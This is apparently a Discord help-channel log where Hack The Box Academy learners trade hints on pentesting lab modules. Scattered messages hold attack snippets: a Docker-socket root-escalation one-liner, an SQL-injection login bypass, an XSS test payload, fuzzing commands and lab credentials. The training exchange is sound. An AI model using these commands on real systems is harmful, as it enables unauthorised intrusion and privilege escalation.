#modules
you don’t even have to use FUZZ with ffuf
it's customizable
lol
maybe is time for a walk or a rest
Maybe it's a problem that I use the pwnbox in my personal VM and not the web pwnbox (DDOS protection for certain IP ranges?).
FFUF quickly found the first few subdomains, but then really slowed down, and errors started to appear.
yea i need to go touch grass, been looking at screens all day
plus it looks like this needs a ton of time to run through anyway
Ok thanks, good to know!
@lusty thicket Can you maybe confirm that the command I used should work, or did you use another one?
Thanks for your help! I might have to try it out later with the web pwnbox...
I managed to find the relevant subdomain. For anyone that might be facing similar issues: try limiting the number of threads in use (I used only 1) and also limit the rate (I used 5 requests per second). Then wait for a few long minutes and you should find the subdomain.
Is there a place to report bugs? I got the flag for the repeating requests section but it keeps saying incorrect, I also saw on the forums that other people may have had a similar problem so JW
module? make sure there's no extra space and refresh the page
@Xre0uS it's the "Using Web Proxies" module. The more I look through the forum tho there might actually be two different "flag.txt" files so I'll keep looking and try refreshing as well. I'll let you know either way
@next bronze Ya no bug, it was like a red herring flag lol Thanks for responding either way!
H M and L stand for high medium and low, right?
yep
I for iron
T is for 'This is the modules channel lets keep it on topic'
on "Pivoting, Tunneling, and Port Forwarding" the part "Web Server Pivoting with Rpivot" im stuck on the last question "Using the concepts taught in this section, connect to the web server on the internal network. Submit the flag presented on the home page as the answer." i have done it but still cant see the web page i even scanned with nmap and its not open etc... any help?
can't run website
How should I write an email to the official or after-sales service? I need to solve some problems.
Try harder? You're using proxychains yeah?
Need to speak to a person? Learn how to reach our support via HTB Labs.
yeah
Hello, I'm having trouble finding the answer to this question, I'm hours in, I did exactly what was asked in the question, I've already redone it about 6 times, I even restarted the computer, but nothing shows me the name they ask for in the generated json file
this is the question
From Module: SOC Analyst
Section : Windows Event Logs & Finding Evil
part : Tapping Into ETW
Replicate executing Seatbelt and SilkETW as described in this section and provide the ManagedInteropMethodName that starts with "G" and ends with "ion" as your answer. "c:\Tools\SilkETW_SilkService_v8\v8" and "C:\Tools\GhostPack Compiled Binaries" on the spawned target contain everything you need.
I managed to generate the file, where there are some names with this ManagedInteropMethodName tag, but none that start with G, as needed in the answer, I did exactly as shown in the step by step, but nothing gives me the code, I don't know what else to do
Might help if you mention which module and section you're in...
thanks, I edited it
Did you run silketw as admin and made sure to keep it running while you execute seatbelt?
Hi
I'm having a port 22 connection timed out problem on the ssh to one of the boxes in htb...any suggestions would help
I have redownloaded the htb vpn file and also restarted the box a few times
is it a box or a module?
read #welcome
its a module
Stack-Based Buffer Overflows on Linux x86
Academy
section?
identification of bad characters
the target should be the same across the sections, were you able to ssh into it for the previous sections?
Anyone know why I would get username and password incorrect when trying to RDP into a machine for a lab?
@fierce veldt try putting single quotes around your username and password
I've done that and attempted to use xfreerdp and rdesktop... Verified spelling multiple times too 😢
most certainly just entering it wrong
what module and section is it and screenshot of your attempt to put it in
It's the Active Directory Enumeration & Attacks - Domain Trusts Primer
I can't send screenshots but the command I use is this
rdesktop 10.129.188.199 -u 'htb-student' -p 'Academy_student_AD!'
I'm not getting an ssh timeout but I'm finding the brute forcing really slow. Re: https://academy.hackthebox.com/module/57/section/516
48.00 tries/min, 720 tries in 00:15h, 44880 to do in 15:36h
Following the directions for brute-forcing gave me 15 usernames and 3K passwords to try, so the box will easily run out of time before this is finished.
Is this expected or is this simply how long these things take?
Yes brute forcing took me a very long time. Might be able to shrink the password list and run concurrent brute forcing sessions.
Thank you. I have -t 4 which was advised as the highest concurrent threads SSH can handle without dropping them
you need to verify your account with the instructions in #welcome to post screenshots
reset the target, wait for 5 mins after it spawns, try again
That's helpful, thank you.
@thorn urchin and @next bronze I tried that as well. Even tried using the pwnbox lol
yea I was
idk y i cant rn
Switching it off and on again hasn't really helped, so I've just chosen the first username and it will just take as long as it takes
hm weird, did you reset the target?
lol same command suddenly works. Cool, sorry for the trouble!
some of the AD labs take a while to spin up
it takes a while yeah, especially that section with multiple domains
Also I think rdesktop wasn't working because it was defaulting to the wrong domain.
yeah ive tried resetting the target as well :/
try with a target in another module, restart your vm, if all else fails, contact support
ok ill try thank u
You should not need to bruteforce ssh directly, the hint is to see if there is another service running that can be bruteforced faster and has someone reusing their pw with the ssh service
Well the question does say to do that
Finally, try to brute force the SSH server shown above to get the flag.
As you now have the name of an employee from the previous skills assessment question, try to gather basic information about them, and generate a custom password wordlist that meets the password policy. Also use 'usernameGenerator' to generate potential usernames for the employee. Finally, try to brute force the SSH server shown above to get the flag.
That's what I'm on. I've got the wordlist and the password list
What is the hint I'm missing? I'm keen for this to not take so long 🙂
would I simply bruteforce the login page? That was the previous exercise
There should be an ftp server running on the same host that is faster to bruteforce
If that’s the section I’m thinking of
I guess if the question wants me to bruteforce something else it should be worded something else other than "bruteforce the SSH server" 😅
Have others had this issue?
(I appreciate the help 🙇 )
It’s a common point of criticism with this module
ah
Some say it teaches you to think outside the box
But the password attacks module has some not-so-user-friendly questions
They come along now and again. I've been searching discord for this wording specifically to see if anyone has had issues. But "slow ssh" was a bit broad haha
I have popped some errata in #858470491676737536
Ssh is notorious for being hard to bruteforce, so you can see this is a lesson of „only try a small wordlist or try something else“
nmap shows 22 and 25 open, not 21 🤔
for sure, I see that 😅
I don't think the skills assessment has a ftp to brute but can't remember
the estimated time is only if it went through all combinations, if it finds a match it won't take nearly as long
There was one where you bruteforced a login page and then pivoted to an FTP server, but that was via localhost.
(I did that one previously)
Thank you so much again @tranquil axle and @next bronze 🙇
So now I've got in 👍 and yes, there was an internal FTP port that I'm now doing another bruteforce on. Much faster (helps to be localhost haha)
take note of which user should be mounting and copying shell
has anyone had any issues with a vm not playing well with the sqli docker instances? It's really strange as I can't seem to get a proper response from them. I have re-downloaded my vpn pack, checked my network settings and it just hangs. But vm instances e.g. windows modules have no issues. It's so strange. Also have no issues using pwnbox at all. This could be an entirely me issue but just curious if anyone else has had anything like this?
Hello, can anyone help me with the question "submit the password of the sqlftp user" from the ntlmrelay module.
I got a password for another user but I don't know how to solve this
section?
The skills assessment section
which question
I believe its question number 3
I was able before to get access to backup01 but I'm stuck afterwards
check what you can access with those creds
@next bronze I tried them with crackmapexec and smb and the --shares option but I didn't see anything worth noticing
no readable shares?
I noticed some readable shares on backup01 and sql03 but with other credentials
@next bronze I found BackupShares on Backup01 and SQlShare on SQL03.
Are those the ones?but I don't know where to go from there
Also sqlftp user is not a domain user afaik
check what shares you can access with the credentials you have, one of them should be pretty obvious
@next bronze I found BackupShares and SQlShare on SQL03
I dont know if those are the one you're talking about?
check what's in those
@next bronze I did but I haven't found something noticeable.
On SQL03, I wasn't able to download the zip file.
why not
@next bronze I used smbmap but every time I try to download it I get a corrupted file
hi guys im on ffuf module and i sent out the ffuf -w -u etc etc and it finished fuzzing but there's no results apart from :: Progress: [81643/81643] :: Job [1/1] :: 197 req/sec :: Duration: [0:05:25] :: Errors: 0 ::
theres no results saying found bla bl
@autumn pilot I tried with smbclient and smbclient.py and I get access denied for the same creds
All I can say is that you have everything that you need to go through that question
@autumn pilot ok, I will retry later, maybe I missed something on the command line or something.
I suck
I was wondering, the target system is pretty slow, connecting to it is pretty slow.
Is that the case for you as well
can anyone help
the section would be helpful
Hello, i am doing the docker part of Linux privilege escalation and i'm trying to run docker but i have this error : docker: Cannot connect to the Docker daemon at unix://var/run/docker.sock. Is the docker daemon running?
When i try to run docker with systemctl start docker i can't because i need the credentials of user lab_adm. So my question is : do i have to do lateral movement to this user ?
no you don’t
docker start ‘container name’
is the right command
you dont need to do anything
you log in via ssh and you can interact with docker directly
Ok thank you, but i dont get it. I use the command provided in the course because the docker.sock is writable but i have this error again
even if the socker is running
docker -H unix:///var/run/docker.sock run -v /:/mnt --rm -it ubuntu chroot /mnt bash this command works for the PE
weird but can happen, try several times is the lesson from this i think
Yeah thank you !
Anyone have any wordlist suggestions for
Attacking Domain Trusts - Cross-Forest Trust Abuse - from Windows
I need to crack a TGS and have tried a couple wordlists with no results 🥲
for htb and do the sub domain fuzzing for .inlanefreight.com
i receive hundreds of replies
is that normal?
ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -ic -u https://FUZZ.inlanefreight.com
If I'm not wrong, you should be able to crack it with rockyou.txt or with the wordlist the module provided you. If it's not cracking either, something is wrong with your offline cracking tool configuration or that's not the way to go.
It's normal to get a lot of replies, you need to make use of the filters and matchers option in ffuf to get exactly what you're looking for. Look into those options -fx -mx
x will vary btw.
Trying john now, tried rockyou first thing on hashcat with no results.
you should eliminate any unnecessary replies by using filters, like -fs 7503 for filtering reply size 7503, etc...
I'm not saying it's the wrong tool, john will do the same as hashcat.
check ffuf -h for more info
Maybe the TGS isn't meant to be cracked and you'd have to find some other way. I'll let someone else that remembers this section give you the exact hint. But in the meanwhile, you might want to check at other ways to go if you're not able to crack the TGS hash.
oh i c dank
LOL I missed one character when exporting my hash via copy and paste...
Knew cracking it wasn't supposed to be the challenging part.
with TGSs not much to do apart from cracking ig
well yea apart from importing it to your kerberos session *
hashcat would have been complaining about it if that was the case. Weird it let you run the wordlists
John complained about it which is what let me know I messed up. Pretty weird that hashcat didn’t catch it though I agree…
idk what to filter, i filtered 403 and there's still a ton of answers
nope it's not filtering by response codes, filter by response size, check the section
it dont say anything
o wait nvm
portal is 0 bytes right
im not sure how else
it dont say
i got the answer and looked for responses of 0 bytes but idk why it's 0
[Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 402ms]
* FUZZ: blog part of the example
-f filters AGAINST the query, -m MATCHES the query btw
so -fs 0 filters out anything that is response size 0 (but you also have to consider 404 response size)
i dont understand the documenting and reporting lab xd
nono i got the ans
they ask you to crack a password from the ntds but that password you got it before if u sniff the network
How do I ssh into the Linux machine(https://academy.hackthebox.com/module/143/section/1489) from MS01 on the powershell prompt. The current approach I have tried isn't working:
ssh htb-student@172.16.5.225
is there a reason why customer subdomain is 0 byte
there are multiple paths to get DA, I found 4 irrc
unless ur just meant to copy from the example
copy/paste is dumb sometimes
password isnt working
I tried manually typing the password too. I guess I will try once more
copy/paste into your attack host, then copy/paste it from there to the rdp session
that has worked for me
like i said
it can be dumb
htb-student is not a user of the linux machine, also you don't need that for that section
no, htb-student is a viable user
the section is the dcsync attack
this is a good module to practice pivot tools, i agree though
it's just nice to do it as the module intended
yea
Hey guy, Quick logic Q:
creating a fake SPN: "blabla/LEGIT" meaning that creating a fake service (blabla) is available to that specific object (user) right?
so why does it help to do a "Kerberoasting attack"?
I could tell you but it would be more beneficial for you to read the materials again, check how a user can request a ST and how SPN plays a part in this
can someone tell me why the vhost ffuf not working on that ffuf module? ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -ic -u http://94.237.56.188:40406 -H 'Host: FUZZ.94.237.56.188:40406'
do U remember what section it is ?
what is ST?
have you read the section/material?
what section do u mean?
Host header needs an actual domain name
i c ok danke
aint no way man, read all the sections relevant to kerberos if you don't know what a st is
service ticket o.O
for the documenting and reporting its awful to do nmap scans wth, i tried locally with ligolo and remotely through the debian RDP
maybe i should add T4
or maybe i should use the prepopulated scans
U mean TGS?
yes its the same as ST just an alias
TGS is the service that provides STs
Client uses the TGT to ask the KDC for a ST (Service Ticket). That ticket is provided by the Ticket Granting Service (TGS).
over ligolo its still awful i will use the rdp for the scans
Well that was condescending
for parameter fuzzing GET that target ip is the exact ip for the parameter fuzzing?
thanks @sly dome
I'm having this exact problem. No combination of the two I found (comma separated, no space, space, etc), or them by themselves seems to be accepted
I've used full URLs, partial, with port, without port etc etc
Do I need to fuzz the answer to figure out the format it wants? Is this part of it? Lol
how do i add subdomains to vhost on /etc/host for ffuf?
OK I've managed it, it was *.academy.htb format. That hint really needs to be in the question
it should be vhost.academy.htb
its /etc/hosts
danke
should remove this, spoilers
do you have notes for the 172.16.5.225? In the documenting lab I got ports open when i ran my nmap but now are closed.
is 172.16.5.225 not your own IP?
it's been a while but from my notes it seems that it's the attack box
hellooooo
soon™, and wrong channel for this
which one "channel"
#1080884182336675872 , read #welcome if you can't access it
This mimikatz command should work ...given that I am in that directory where the tool is. (pertaining to the second question of this module)
https://academy.hackthebox.com/module/143/section/1489
is that mimikatz an exe?
cant find the command injection xD
this lab is driving me mad
i think im just going for the attacking enterprise one
Yes
anybody has found the command injection in "Documentation and Reporting"?
no, it is a folder
There is no mimikatz.exe in your folder
yes don't overthink it, it's super simple
there's another folder named mimikatz, might be in there.
just cd mimikatz; ls
is it in the nix machine? i cant leverage the LFI to RCE
mimikatz is the folder
yep
yeah .127 right? try just ;<command>
yea sometimes its so obvious i fkn miss it
i was like "why is cat in a website"
who the hell use cat to show web contents HHAHA
thx
yep lol, I also overdid it but it's really just that
its so unrealistic
but yea, lets continue
i dont feel like doing a report for this lab, what do you think?
i feel like investing the time in the black box approach for the Attacking Enterprise is better
I think it's up to you, if you feel like your reporting skills are up to scratch then sure
yeah that can be a better option
i feel this lab a bit weird and "small"
ofc its just for a quick documentation and reporting module
i understand it!
yep enterprise networks will be a lot more realistic
i just have a personal workflow for my notetaking and all that
for example i dont use the "writehat" tool in it
lets go then
i will take 24-48h to finish it
after that maybe someone can do QA to my draft
sure but only if you send it to me on confluence 
im using SysReptor
joking, I can take a look at it if you want
Hi there, does anyone have some tips for the Skills Assessment, task 1 in INTRO TO ASSEMBLY LANGUAGE ? I found a shellcode by modifying the code (the same like a lot of people here : 4831c....0f05) but it just gives me an access with a red prompt with no flags when i load it to the target. The code seems good, i think the problem is when i run gdb but i'm lost for the moment.
Thanks a lot
check this #modules message
Thanks, I've already checked that, i don't know if the shellcode must be loaded as it is or not. I've tried to inverse the bits but same results. I think i must re-read the entire module to be more comfortable with GDB😫
no need to inverse, run it as it is, your output looks right from the few digits you sent
dm me what you got if you can't figure it out
Ok, i will retry and if i'm stuck i will dm you 🙂 thanks a lot
Hello, module ATTACKING ENTERPRISE NETWORKS and section is Lateral Movement, i have a administrator group but how can i read the flag.txt file on the desktop. I cant dump any hashes about Administrator account, but i am in that group HELP pls !! (Also i cracked the kdbx file but password is incorrect so i cant rdp :/ ) PLS DM ME!
@knotty chasm just hit Ctrl U and you will see the code. The answer is right there
I hate to be a pain, but does anyone here offer coaching? I currently work as a bouncer and am looking to transition into CySec, Just finding it hard to find my feet. My Friend said HTB is a good starting place
Currently doing Intro to academy, and while I can make my way through the modules, I feel like I'm stumbling through rather than absorbing knowledge. Or is it designed to be that way and it'll become more clear as I progress?
Hi everyone. I was studying the passthehash section of the Password Attacks module and I am a bit confused. Can you explain to me what the difference is between PassTheHash and OverPassTheHash in terms of mimikatz? In the sections, the syntax for both methods is the same. Could you help me please?
you authenticate directly using the hash with pth, with overpass the hash, you use the hash to request a kerberos ticket, and further authentication will be done through kerberos
Theoretically, yes. But is it done automatically by mimikatz? How does mimikatz differentiate between PTH and OPTH if I use the same syntax?
stumbling is how you learn, take notes and you'll get better as it goes on. this channel is open for you to ask for help if you need it
mimikatz should have the /ptt option to inject the ticket in your current session
Fair point
hello! i got stuck at Active Directory Enumeration & Attacks Assessment part 1, i found another domain user by chance and i need to find the user's cleartext pw. Is there any guess what to do now?
question?
So sekurlsa::pth /ntlm: is not overpassthehash, am I right?
from what I know, no
Stuck on "Windows Privilege Escalation Skills Assessment - Part I". Cannot get a revshell. Tried uploading nc.exe and using the commands from www.revshells.com as well as all the PowerShell one liners from there. Any hints?
do you have any hint how should i get the cleartext pw?
Sounds like you may want to dump some secrets 😉
ah lemme try that 😄 thx
was asking for the question you're stuck on but yes that should work 
I don't remember this, I'll take a look if no one else helped in a bit
Much appreciated, been banging my head against the wall for a while now...
This industry is diverse and complex. Initially, it might overwhelm you like trying to drink from a fire hose, but the key is to take it step by step. Maintain your curiosity and persistence. Continuous learning is a part of this field, and it's impossible to know everything.
oh 😄 i misunderstood that
Solved it. Downloaded a new VPN using Academy 2 instead of 1 and TCP instead of UDP...
oh nice, might just be you got a new target, tcp is always more reliable though
Hi Guys, This is my first and newbie question .... from the service scanning module I'm trying to answer the conclusion questions but I got stuck getting the "bob" password for smbclient, the tip is the password is weak but I tried so many without success, may I use hydra to brute force or is there an easier way ? If someone could put me on the way again... I would be very grateful.
I would assume if they say the password is weak they want you to either use some common default creds or use a tool to bruteforce the creds. I can't remember that far back and don't have notes on it.
hello
hi is there a general discussion channel?
hello
hello call me
?
wats your name
So sorry, looking again, the password was in the module content
hello
thank you:)
Hey
In the module Shell & Payloads, the live engagement, in the second hint it reveals the username and password of the blog
It's possible to get it without the hint? If yes, how

Section: Linux Priv Esc
Module: Polkit
I transferred the compiled version of CVE-2021-4023 onto the target machine with scp. but i get this.....
htb-student@ubuntu:~$ ./poc
./poc: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./poc)
Anyone having issues spawning target VMs today?
i didnt have any problem but today the latency is very high
so today i was doing appointment machine in starting point and it was based on sql injection. the solution was to use admin' # (so to make the rest of the line as a comment in php) but why didnt admin' OR 1=1 -- work?
anyone ._.
I asked earlier for some help with the ntlmrelay skills assessment.
It turns out the issue I was having was with smbmap only.
in that case if the box has gcc then you should compile the .c file inside the box and should work
in general you should try couple of payloads, and eventually one of them will work
this question should be asked in #starting-point
anyways its because -- needs a space afterwards to be recognised as a comment, so you'll need to do -- (note the space), or -- -
okay thank you i will try that
meaning you transfer .c file to ssh session , then compile it there
yea im dumb
Desktop
i swear i tried to compile on target machine... but i guess i didnt try it for this module
thank you
anyone having trouble getting targets to spawn?
the Active Directory LDAP module could really use a rework or extra content imo, the length is rather disappointing for a tier 4 module, other tier 3 or even tier 2 modules have more content to learn and arguably better made/organised. it's probably one of the few modules in academy that can be done way quicker than the estimated time. and from the phrasing of this module it's quite clear that its supposed to be done before the other AD modules, which is odd and I doubt many have done that. it's still a decent module but can't be compared to the newer ones, at its current state it shouldn't be a tier 4 module
I don't think it can be considered errors? 😅 just my thoughts on it

It’s for feedback as well
fair enough
hello
hi
has anyone completed protein cookies2 challenge
Hi is anyone able to give me a hand with the ad enumeration module privileged access, last part leverage sql admin rights to authenticate to host and read desktop flag
Is this sentence from the intro to metasploit module confusing anybody else or is it just me? "Shikata Ga Nai (SGN) is one of the most utilized Encoding schemes today because it is so hard to detect that payloads encoded through its mechanism are not universally undetectable anymore. Far from it."
Do I need to create a tunnel to connect through to the local pc?
just use the read file command nothing extra
Can I dm you?
no
Can I advertise my ethical hacking community here?
read #rules
Lol, doesn’t make sense to me tho how can I authenticate to a windows host that doesn’t have python use mssqlclient.py to then authenticate to an internal ip then read a file on that desktop
you can use the linux box that's on 172.16.5.225 :) (you have the creds for it); alternatively - yes you can use pivoting and mssqlclient.py on your system
Can I have some clarification on the "Packet Inception, Dissecting Network Traffic With Wireshark" module task
It states that you need to find the malicious actor in the live environment
however there does not appear to be any data relevant to that search in Wireshark-lab-2.zip
The answer to the first question can totally be found in that .zip
But the rest just leads to some confusing rabbithole
hello there & Happy New Year 2024, I don't wanna spoil, anyone willing to chat about the Logrotate LPE exercise?
If anyone has done the noSQL injection skills assessment 2 can you please dm me? || I have a script that allows me to exfil the username through time-based blind injection, but when i do this.password instead of this.username, it no longer works || thank you!
anyone happen to know a HTB box that has a lot of ports open?
still stuck?
You will need to import the module for powerview.ps1 before that command will work. It is in the tools directory of the machine you RDP'd into.
for future learners, you might not be looking for the password, try to exfil something else that will help you get in
Hi, any tips for “ (Intro to Assembly Language - Conditional Branching)” ? I managed to avoid the loop but I don't understand which HEX value is expected in the response.
Got this sorted, you do indeed need to connect to the VM via RDP to be able to answer the second question
I take it that there's some script running periodically for you to capture?
Yep, it's on a seemingly dead interface but every now and then like 150 packets spin up
I just did that one yesterday and you have to put a random password in as the front end webpage requires the password field to not be empty
When you turn your PC on after 5 years
why are they doing the -H Content type, isnt it sent automatically without need for it specifiying? @htb[/htb]$ ffuf -w /opt/useful/SecLists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u http://admin.academy.htb:PORT/admin/admin.php -X POST -d 'FUZZ=key' -H 'Content-Type: application/x-www-form-urlencoded' -fs xxx
probably to prevent misinterpretation
htb academy first hands-on question has incorrect question/answer..
good start for something i just burned $677 cdn on lol
Can I get some insights about why the exploit in the "Public Exploits" module in the Pentester job path works? There was nothing in the NMAP scan for example that would imply that the web application uses that technology.
Hello, dear people. In the INTRO TO ASSEMBLY LANGUAGE module, I "run" after writing "breakpoint _start" in the gdb debugger tool. But I get <_start+0> values in the results. Example output :
→ 0x401000 <_start+0> movabs rax, 0x21796d6564616341
0x40100a <_start+0> xor rax, 0x21449
0x401010 <_start+0> xor rax, rax
I solved the question but I wonder why this happened. (I found it by guessing because the question asked to find the start + 16 value.)
I'm leaving things purposely vague because I don't want to spoil things for anyone. I'd be happy to go into specifics in DMs or here if its okay.
The webpage mostly implies it
CAN ANYONE HELP?
please refrain from using caps
@autumn pilot sorry I didn't pay attention
this can be corrected
you'll just have to specify more details or post in #858470491676737536
where the error is
ok sure
Stuck on the Splunk module, which account had most login attempts in 10 minutes. Tried making 10m timespan bins and sorting by count and account name, any help?
i am working on the web enumeration and exploitation section of attacking enterprise network...and i am trying to change the twenty twenty 404 template but i get this error...is this supposed to happen ?
"Unable to communicate back with site to check for fatal errors, so the PHP change was reverted. You will need to upload your PHP file change by some other means, such as by using SFTP."
Tbh I think that question is misleading, it wants to know which accounts have <10m between first and last successful login event and which of those has the most successful logins
Resolved.
NVM....figured out the issue
any tips for how to search for that? I'm struggle bussin
Anyone else feel like complete idiots when doing some of these exercises, I spent 3 hours on one question and it deflated my ego completely
Ohhhh yeah, but I live for the "aha" moment that comes after lengthy periods of trying different things, and researching
changes 1 parameter in command ohhhhh I'm dumb
I was gonna say "I'm an idiot and forgot the semi-colon again", but thought maybe that was more applicable to the java class I just took
Or mysql

you still need help with this?
I finished the AD section and I am building my own tools folder now before I do the assessments at the end. I have never really had to compile my own stuff so I am a bit lost on that. Anyone have some good resources on this topic?
Just download them from the C:/tools folder
get a windows vm, install visual studio
this works until you need to use something that's not in there 
Skill issue then
Its best practice to compile for yourself right?
yes
Yes it is best practice though
if you're really lazy, there's this, but compiling yourself is recommended
https://github.com/Flangvik/SharpCollection
I don't understand what this question is asking. I am specifically confused by "use ZAP Fuzzer to fuzz the cookie for different md5 hashed usernames to get the flag". I think I went to the right URL as stated and see the set-cookie for IP:Port/skills, but a bit lost here on why/how the fuzzer is the answer, like what is actually occurring with the fuzzer.
That’s what I got😄 and https://github.com/r3motecontrol/Ghostpack-CompiledBinaries
set the fuzz location to the /skills/ part?
to the cookie
ahh so i grabbed the wrong item here then
intercept a request to the skills directory
You need a cookie to hash
so now i would need to highlight that part and do a fuzz again on it
ahhh i think i see
now do i select the full value for cookie or just after "Cookie:"
full cookie value
read the hint
Careful with sharing your progress
?
Could be considered spoilers
sorry, i just need some more help than what is presented in the academy site
Just need to repeat those requests with each cookie
i did but im not getting what i need i dont think
all the items returned have same content length so something im doing is def off
you can try manually inspecting each response
Hello
even though content-length appears to be all the same ?
Please
strange
For the last time: go to police
3
3 now yeah
ban incoming lol
Sorry bye
i swear that this is setup correctly for the fuzz attack to or else how would i be getting these responses
Go contact police
manually go through each response
what is the fuzz attack?
Google will help you
google is your friend
It’s specifically for insta
just leave, you arent here for any legal reason
fuck off
hi guys I am doing XSS module and when I execute <script>alert(window.origin)</script> on the page nothing shows up?
I heard zucc really like to be fuzzed
strange, each request has the different cookie with fuzzing as it should, but the response all has the same cookie
all?
yupp
We don't wanna listen to a voice memo
@lusty thicket @fathom pendant thank you i got it!!!!
I would rather shove my hand in a blender
ty
ughhhh lol that rush when you finally get it right lol
np
I heavily dislike personal interaction with people I dont know
hmm
sorry for my absolute ignorance about this, but how can I find the version of glibc for the Shared Object Hijacking exercise under the LPE module?
ldd --version
Does anyone know any good notes summary/cheatsheet for CPTS?
I was looking for something like that online to compare to my notes and make sure nothing was missing but couldn't find anything
I don't think there are cpts specific cheatsheets around, but there are a lot of pentesting related ones. it's better to build on what you have
I am. I just find it difficult to structure them in categories that would make sense to easily find what I'm looking for later, so I wanted to see how it's normally done.
I end up getting lost with all my notes when it should be helpful. I watched a bunch of different videos on using Obsidian etc. and it just doesn't seem to click.
Can I chat with somebody about the (first) skills assessment in the Active Directory Enumeration Module (143)? I set up a pivot from the first machine back to my attack host (VM with VPN). From that first machine I've got credentials for a user, and can winrm into a new machine, using either ligolo-ng or chisel as a pivot. However, nothing I try to do to copy binaries from my attack box to the new machine works.. it doesn't seem to be connecting out through either pivot
structure them according to your methodology, I found that the checklists on hacktricks are decent, you can base it on that
I build my obsidian notes kinda like wikipedia, with crosslinks to other relevant sections or more detailed notes for quick access. and I use a plugin called quickswitcher++ which lets me search through all headings in my vault, and I can adjust the weightage of different types of headings, so I pretty much have my own search engine in the vault that lets me find any info I want within seconds, kinda necessary cause it has close to a million words total. but that's just personal preference, find a way that works for you
[[SectionName #header |relevance]]
Mind if I DM you? Sounds like I could benefit from your input.
you need to open a port for the internal machines to reach your attack box, if you're using evil-winrm you can use it to upload stuff directly
yeah that's one way to do it
i'll keep the quickswitcher plugin in the back of my mind when i go to revise my notes though
it's really good, basically google for my own notes
i need to go back and condense; ad is really slowing me down tbh just because a lot is overwhelming me
like I absorb the knowledge but it make brain hurt
ungabunga run exploit
check out the ad pentest mindmap if you don't know about it
https://github.com/esidate/pentesting-active-directory
eh it's not really needing a mindmap for it
it's just literally how i absorb information
depending on the type/difficulty it exhausts me quickly
i am an info-sponge
ah I see, I guess the best thing is just do it a lot, it will get a lot more comfortable as it goes on
bc i get the concept and the commands. Just a PITA to absorb LMAO
yep there sure is a lot of shit
but that's also why it slows me down; because I want to know what the command is actually doing
i.e. searching for what rights this user/group sid has over another object
for the commands that aren't obvious what they're doing, I usually add comments to explain in my code blocks
yeah
Oh yeah, forgot about the direct upload.. all good now thanks!
speaking of alternate tools, i wanna give pwncat a try eventually for revshells
apparently it has an enum script that works in much the same way linpeas does
saw John Hammond use it for Shakabrah Offsec Box
oh cool, thought it's just a listener
it's apparently got some neat features idk if it's in a repo for parrot or kali
apparently you can just pipx install it
neat
bad idea to skip the linux fundamentals module?
its pissing me off
its a 6 hour module and ive been on it for like 2 weeks
what are you struggling with
having issues with the metasploit module myself
the first question is a small ctf on using the eternalromance
the os should be windows 7 but nmap is returning differently
while it is basics. it helps to form a baseline of what you can understand
i wonder if this is an issue with the box
it doesn't have to be windows 7;
it's based off smbv1
The SSRF part of the server side module is one of the most dense, confusing things I've seen in the course
the exploit fails every time
are you sure you're setting up the RHOST/LHOST correctly :)
im using the target ip as RHOST
and im using the ip from ifconfig as LHOST
which is the vpn addr @ 10.10.yadyada
exploit fails or no session created? there's a difference
no session
wrong lhost ip
think about what's the ip of the the target
pro tip: assume you're making a mistake first, it's usually not the machines 😄
truly!
i dont know if im using the openvpn correctly tbh
at first it was all errors and now i can ping the box so i assume its working correct
ill fiddle with the lhost
if you can run exploit against the target, your vpn is fine
thats good to hear
im usually into reverse engineering and gamehacking so this cyber element is new to me
don't they have you ssh to a system first on this one? or am i misremembering this section
no
the first one is using metasploit to do the ctf
reverse shell
using eternalromance exploit
what's the rhost?
btw with msfconsole you can just do set lhost tun0 to have it grab it
instead of fully typing it out
i see
set lhost <interface>
i swear you could set it, maybe not or a change happened but i've been able to successfully set it by just specifying interface
execution expired got nothing to do with setting the lhost tho, that's an error when running the exploit
weird, im using the default cfg
just changed rhosts and lhost
ill reset the target
¯\_(ツ)_/¯
you're using the psexec eternalromance yeah?
(the command one just does RCE, not a shell)
you are getting an error which is from the latest metasploit version
what does the error mean?
is this?
whats a non standard directory?
wdym? context?
a non-standard directory is a directory that's not there by default
i.e. a standard linux directory for users is /home/user/
what does ||[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp|| mean?
nothing
i see
can you tell us the exact error 😂
Hi, I'm new to the server!!
it gets removed
is the “no module named sysinfo”?
[*] target - Target OS: Windows Server 2016 Standard 14393
[-] target - Timeout::Error
[-] target - execution expired
[-] target - /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/timeout-0.4.1/lib/timeout.rb:43:in `rescue in handle_timeout'
/us
there is a lot more text after
is your target even alive? ping it
I have a question regarding the module:
Getting Started : Public Exploits
In this module you need to exploit a vulnerable plugin, namely:
Simple Backup Plugin 2.7.10 for WordPress
The only reason I was able to exploit it is because the webpage basically tells you about it in plain text in the form of a blog post. However, I don't feel this reflects a real-world webapp; they don't announce their plugins and versions. I can't figure out a command that lets me find this plugin on the webpage.
I've just reset the target webapp here:
94.237.62.195:47057
What tool/command finds the actual plugin without just reading the title of the banner?
i dont know if this has to do with using wsl + kex as opposed to a traditional vm
i can pop a kali vm onto kvm/qemu
it happens more often than you think
i completed the module with debian wsl + exegol
also i recommend trying the other eternal romance which is just RCE
and change the COMMAND option to whoami /priv
I'm willing to accept that sometimes websites may do that. But there must be a way to find the plugin without relying on a user error like that, right?
there's some modules that go over enum tools
there's a hacking wordpress module : but for the purposes of demonstration that's why it was so simple
they wanted the focus to be putting you in the mindset
=\
seems i will get the same error no matter the exploit used
yeah, i use setg instead of set before
i don't mess with WSL just because I like having an easily configurable virtual environment ¯\_(ツ)_/¯
also copy/paste go brr :D
??
not a fan of dragonised garuda
wdym installing win10?
are you using a vm in a vm type deal or somethin?
saw you mention kvm/qemu
yeah, i was going to use kvm/qemu and passthrough a gpu to use windows in vm and linux as host
no, using wsl on my laptop
that's why i was confused for a sec
it virtualizes the virtual
there is no "best distro"
i've heard its just packages
i was using garuda blackarch
but for the most part if you're using a debian based distro it's all the same
but for htb using kali wsl
personal preference mostly ¯\_(ツ)_/¯
i was trying to find a distro that looks like windows 7
there's not really a distro that looks like win7
you can customize using a KDE
and google different KDEs to find one that might be similar
basically
I went through the various enum tools discussed prior to the module to see if any of them would show the Wordpress plugin.
